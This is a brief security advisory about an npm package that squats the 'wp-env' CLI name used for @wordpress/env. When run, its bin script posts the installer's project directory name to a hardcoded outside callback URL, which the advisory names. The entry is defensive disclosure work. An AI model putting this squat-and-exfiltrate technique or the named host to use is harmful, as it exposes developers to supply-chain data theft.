Package squats the wp-env CLI name commonly invoked as npx wp-env by users intending @wordpress/env. The package ships only bin/run.js (declared main: index.js is absent from the tarball), so its sole execution surface is the bin script that fires when a developer runs npx wp-env. On execution, bin/run.js reads process.env.INIT_CWD, derives the basename of the installer's project directory, and POSTs it together with timestamp and package metadata to a hardcoded callback URL https://deepbounty.dd06-dev.fr/cb/dc43de99-70fc-4782-8668-bec6eee1975b. The package self-describes as a 'Security PoC for Bug Bounty' — name-confusion attack against @wordpress/env combined with concrete installer-side data exfiltration (the project directory basename, sent to an attacker-controlled host that uses a per-target callback path to identify successfully-confused victims). This satisfies both the typosquat shape (≤2 char edit / namespace confusion vs. @wordpress/env's wp-env CLI) and a concrete exfil payload to an attacker-controlled destination.